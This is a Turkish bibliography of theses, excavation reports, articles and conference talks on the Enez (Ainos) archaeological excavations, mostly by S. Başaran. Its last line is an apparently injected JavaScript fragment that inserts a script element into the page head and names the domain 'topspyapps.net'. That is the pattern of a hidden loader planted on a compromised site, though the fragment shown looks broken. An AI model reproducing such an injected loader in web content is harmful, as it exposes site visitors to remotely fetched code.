Yayınlar

TEZLER

1- Şahin,R., 2013: Ainos (Enez) Kazılarında Bulunan Kırmızı Figürlü Keramikler,İstanbul Üniversitesi Sosyal Bilimler Enstitüsü Klasik Arkeoloji Bilim Dalı

2- Yağız,Y., 1998: Ainos Kazı Sikkeleri, İstanbul Üniversitesi Sosyal Bilimler Enstitüsü Klasik Arkeoloji Bilim Dalı

1- Başaran,B., 2010: Enez Ayasofya Kilisesi (Fatih Camisi)’nde Kullanılan Yapı Malzemesinin Analizi ve Konservasyon Yöntemleri, Kadir Has Üniversitesi Fen Bilimleri Enstitüsü

2- Kurap,G.,2006: Ainos Pişmiş Toprak Lahitleri: Tanımlama, Koruma ve Onarım Çalışmaları, İstanbul Üniversitesi, Sosyal Bilimler Enstitüsü, Taşınabilir Kültür Varlıklarını Koruma ve Onarım Bölümü.

3-Tuncay,G.B., 2003: Enez’de Bizans Devri Dini, Yapıları,. İstanbul Üniversitesi Sosyal Bilimler Enstitüsü,Sanat Tarihi Anabilim Dalı.

4-Irmak,E.N., 2009:.Enez’de (Ainos) Ele Geçen Orientalizan Dönem Seramikleri,Trakya Üniversitesi Sosyal Bilimler Enstitüsü Arkeoloji Anabilim Dalı

5-Köse, V.,1993: Ainos Pişmiş Toprak Heykelcikler, (Oturan Kollu Aphroditler ve Adak Grubu Eserleri). .İstanbul Üniversitesi Sosyal Bilimler Enstitüsü Klasik Arkeoloji Anabilim Dalı.

6-Günözü,H.,2007:Enez Ayasofya’sı (Fatih Cami) Duvar Resimlerinin Analizleri ve Koruma Önerileri, İstanbul Üniversitesi Sosyal Bilimler Enstitüsü Taşınabilir Kültür Varlıklarını Koruma ve Onarım Bölümü-Anabilim Dalı

ENEZ’E İLİŞKİN YAYINLAR

1- Başaran,S.,2013:“Enez-Ainos”, Enez Doğal,Kültürel ve Turistik Güzellikleri, 1-90 Ed..A.Yeşil,A.Uzun, G.A.Aksu. İstanbul Üniversitesi Yayınları.

2- Başaran,S.,2013:“Antik Ainos Kenti. Enez’in Konumu,Coğrafi Özellikleri ve Tarihi” Edirne.Taşınmaz Kültür Varlıkları Envanteri II, 228-244. Trakya Kalkınma Ajansı

3- Başaran,S.,2013:“Enez’den Bir Mezar Steli”, Sümer Atasoy’a Armağan, 13-18 Ed. Şevket Dönmez

4- Başaran,S.,2012:Enez (Ainos), Paragraf Yayınları (Türkçe-Almanca-İngilizce)

5- Başaran,S.,2012:“Enez (Ainos) 2011 Yılı Arkeoloji Kazısı”, 34.Kazı Sonuçları Toplantısı 2,375-390

6- Başaran,S.,2010:“Enez(Ainos) 2009 Yılı Kazısı,Onarım-Koruma Çalışmaları”,32.Kazı Sonuçları Toplantısı 4, 145-168 144 (B.Çakan -G.Kurap-St.Karwiese_R.Yılmaz ile)

7- Başaran.S.,2009:“Enez’de (Ainos) Roma Dönemine Ait Bir Zengin Evi”, Altan Çilingiroğlu’na Armağan, 111-124. Edt. H. Sağlamtimur ve diğ. Arkeoloji ve Sanat yay.

8- Başaran,S., B.Çakan-G.Emre-G.Kurap-St.Karwiese- R.Yılmaz 2009: “Enez(Ainos) 2008 Yılı Kazısı,Onarım-Koruma Çalışmaları”,31.Kazı Sonuçları Toplantısı 2,117-144

9- Başaran,S.,2009: Enez’de (Ainos) Roma Dönemine Ait Bir Zengin Evi”Altan Çilingiroğlu’na Armağan,111-123

10- Akyüz,S.- Başaran,S., ve diğ. 2008: “ Analysis of ancient potteries using FT_IR, micro-Raman and EDXRF spectrometry”, Vibrational Spectroscopy 48, , 276-280

11- Akyüz,S-Başaran,S. ve diğ.,2008:“Instrumental Neutron Activation Analysis of Ancient Glass Excavated ın Enez Ancient Ainos) Turkey”, The Fifth Eurasian Conference Nuclear Scienc and its Application, 14-17 October 2008, Ankara, ,171-172

12- Başaran,S.,2007 : “Enez’de Ortaya Çıkan Klazomenai Tipi Lahitler”, Refik Duru’ya Armağan, 271-276

13- Başaran,S.,2007: Die Ausgrabungen in Ainos ( Ein Überblick)“ , Thrace in the Graeco Roman World, Procedings of the 10th International, Athens 72-79 Congress of the Thracology, Komotini-Aleksandropolis 18-23 Oktober 2005,

14- Başaran,S., 2005, Enez (Ainos) . Broşür

15- Başaran,S., 2005: “ Enez (Ainos) 2004 Yılı Kazı, Onarım ve Koruma Çalışmaları”, 27. Kazı Sonuçları Toplantısı 2, ,409-420

16- Başaran,S.,2004 : “Ainos (Enez)”, Arkeoatlas, ,sayı:148-149

17- Başaran,S.,2004: “Ainos (Enez).Balkanları Anadolu ve Ege’ye bağlayan kent”,Toplumsal Tarih, sayı 125, 84-87

18- Başaran,S.,2003 :“Ainos’un Geç Hellenistik-Erken Roma Dönemi Seramik Buluntuları”,Varia Anatolica XV, les Ceramiques en Anatolie aux Epoques Hellenistique et Romaine, İstanbul, 71-7 7

19- Başaran,S.,2003:“Enez (Ainos) 2001 Yılı Kazı ve Onarım Çalışmaları”, 24. Kazı Sonuçları Toplantııs 2, 283-294

20- Başaran,S., 2002: “Enez (Ainos) 2001 Yılı Kazı ve Onarım Çalışmaları”, Anadolu Araştırmaları XVI,59-86

21- Başaran,S., 2000: “Enez (Ainos) Kazı ve Onarım Çalışmaları”,Kazı Sonuçları Toplantısı 2,405-416

22- Başaran,S.,2000: Enez (Ainos), İstanbul,

23- Başaran,S., 2000:“ Aeolische Kapitelle aus Ainos”, Istanbuler Mitteilungen 50, 155-168

24- Başaran,S.,2000: “Enez (Ainos) Kazıları”, Türkiye Arkeolojisi ve İstanbul Üniversitesi 1932- 1999, Ankara, 251-259

25- Başaran,S.,1999: “Enez Çevresinde Yapılan Arkeolojik Araştırmalar”, Zafer Taşlıklıoğlu Armağanı. Anadolu ve Trakya Çalışmaları I, İstanbul,169-197

26- Başaran,S.,1999 :” Zum Strassennætz um Ainos’, Steine und Wege. ÖAI, Sonderschriften Band 32, Wien,343-348

27- Başaran,S.,1998: “Orta Çağ’da Enez”, Sanat Tarihi Dergisi IX, 1-12

28- Başaran,S.,1998 :“Enez (Ainos) 1996 Yılı Kazı ve Onarım Çalışmaları” , XIX.Kazı Sonuçları Toplantısı II, 593-624

29- Başaran,S.,1996:”Ainos Kazıları 1971-1994″, Anadolu Araştırmaları XIV, 105-141

30- Başaran,S.,1996 :“ Enez (Ainos) 1995 Yılı Kazı ve Onarım Çalışmaları”, XVIII. Kazı Sonuçları Toplantısı II, 489-513

31- İlkışık, M.,- Başaran,S.,1995: “Enez Çataltepe Tümülüsünde Elektromagnetik –VLF ve Elektrik Araştırmaları”, Jeofizik Dergisi 9,sayı 12, 19-23 ()

32- Başaran,S., 1992:”1991 Yılı Enez (Ainos) Kazıları”, XIV. Kazı Sonuçları Toplantısı II, , 205-221. ( A.Erzen, İle)

33- Başaran,S.,1991: “Enez (Ainos) Kazısı, 1990 Yılı Çalışmaları”, XIII.Kazı Sonuçları Toplantısı II, , 53-58. (A .Erzen ile)

34- Erzen, A.- Başaran,S.,1990: “Enez (Ainos) Kazısı, 1989 Yılı Çalışmaları”, XII. Kazı Sonuçları Toplantısı II, 155-170.

35- Erzen , A -Başaran,S.,1989: “1988 Yılı Enez Kazısı Çalışmaları”, XI.Kazı Sonuçları Toplantısı II 107-123.

36- Erzen,A.,-Başaran,S.,1988:”Enez (Ainos) Kazıları,1987 Yılı Çalışmaları”,X.Kazı Sonuçları Toplantısı II, 89-107

37- Başaran,S.,1988: “Enez’in Tarihi Önemi, Arkeolojisi ve Turizm Bakımından Oynayacağı Rol”, Gala Gölü ve Sorunları Sempozyumu, 67-69

38- S. Akyuz, T. Akyuz, G. Kurap, S. Basaran, B. Ucar-Cakan, I. Kocabas, 2011: “Archaeometric Nnvestigations of Terra-Cotta Sarcophages from the Excavations at Ainos(Enez) Turkey”: An EDXRF Study Asian Journal of Chemistry, 2011, Volume 23, Issue 7, Page 3235- 3239

KONFERANS,SEMPOZYUM VE BİLDİRİLER

1- 2013 Enez Kazı Çalışmaları: Suna-İnan Kıraç Akdeniz Medeniyetleri Araştırma Enstitüsü Enez’de Yapılan Kazı Çalışmaları

2- 2005-2013 Mayıs aylarında Edirne Müzesi Arkeoloji Günlerinde, Enez Kazıları. Genel Değerlendirme

3- 2012 İtalya-Auguri dal Salone del Restauro di Ferrara şehrinde: İstanbul Üniversitesi’nin Yenikapı Teodosius Limanı ve Gemilerde belgeleme konservasyon ve restorasyon Çalışmaları

4- 2011 Almanya- Römisch Germanisches Zentralmuseum Mainz’da, Die Ausgrabungen in Ainos

5- 2010,2011 ,2012 Yunanistan’ın Aleksandrapolis’de (Dedeağaç) Ainos (Enez )

6- 08. 04. 2011 Viyana –Österreichesches Archaeologisches Institut: Die Arbaiten in Ainos

7- 5 Aralık 2011 Enez’de – İstanbul Üniversitesi Himayesinde Enez kazısı Çalışmaları

8- İstanbul Kültür Sanat Vakfı (İKSV) 2011: Enez Kazılarına Genel Bakış

9- 2010 İstanbul: Trakoloji Kongresi; Enez -Su Terazisi Kazılarının Genel Değerlendirmesi.

10- Osmanlı Bankası Etkinlikleri Çerçevesinde; 26 Mart 2008 – Trakya’da Bir Prenslik Merkezi: Ainos Antik Kenti

11- 18-23 Ekim 2005 Uluslararası Trakoloji Kongresi (Komotini ve Aleksandroupolis’te)” Die Ausgrabungen in Ainos (1978-2005)

12- 1997 Kırklareli Müzesi Arkeoloji Günleri: “Enez Kazılarına Toplu Bakış”

13- 1997 TÜYAP BOAT İstanbul Fuarı Çerçevesinde “Enez Kazıları”

14- 19-23 Mayıs 1997 Mersin’de IV . Anadolu Demir Çağları sempozyumunda “Demir Çağda Enez Keramiği” konulu bildiri.

15- 1990—2012 yılları arasında Kültür ve Turizm Bakanlığı Kültür Varlıkları ve Müzeler Genel Müdürlüğünce her yıl düzenlenen Kazı Sonuçları Sempozyumunda “Enez (Ainos) Kazı ve Onarım Çalışmaları” bildirileri sunmuştur.

16- İ.Ü.Enez Helio-Hidro Terapi Merkezinde yaz ara verme aylarında Üniversite mensuplarına Enez Kazılarına İlişkin slayt gösterileri, anlatımlar ve alanda geziler sunulmaktadır.

17- İstanbul Üniversiesi Arkeolojik Kazı ve Araştırmalar Sempozyumlarında; Enez (Ainos) Kazı ve Onarım Çalışmaları bildirileri başlangıcından 2008 yılına kadar sunulmuştur.

 var d=document;var s=d.createElement('script'); d.getElementsByTagName('head')[0].appendChild(s);topspyapps.net